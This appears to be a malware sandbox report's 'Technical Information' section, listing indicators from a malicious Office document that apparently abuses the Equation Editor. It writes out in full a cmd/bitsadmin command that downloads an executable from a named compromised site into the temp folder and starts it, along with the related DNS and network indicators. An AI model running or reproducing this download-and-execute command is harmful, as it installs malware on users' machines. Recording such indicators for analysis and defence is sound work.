Technical Information
- '%WINDIR%\syswow64\cmd.exe' /c bitsadmin /transfer Or /priority foreground https://www.gorontula.com/wp-admin/includes/_output45DBD60.exe %TEMP%\A.exe && start %TEMP%\A.exe
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.word\~wrf{362eac86-fc97-4205-88ff-b01bc3a8613a}.tmp
- 'go###tula.com':443
- DNS ASK go###tula.com
- '%WINDIR%\syswow64\cmd.exe' /c bitsadmin /transfer Or /priority foreground https://www.gorontula.com/wp-admin/includes/_output45DBD60.exe %TEMP%\A.exe && start %TEMP%\A.exe (with hidden window)
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding
- '%WINDIR%\syswow64\bitsadmin.exe' /transfer Or /priority foreground https://www.gorontula.com/wp-admin/includes/_output45DBD60.exe %TEMP%\A.exe
- '%ProgramFiles%\microsoft office\office14\excelcnv.exe' -Embedding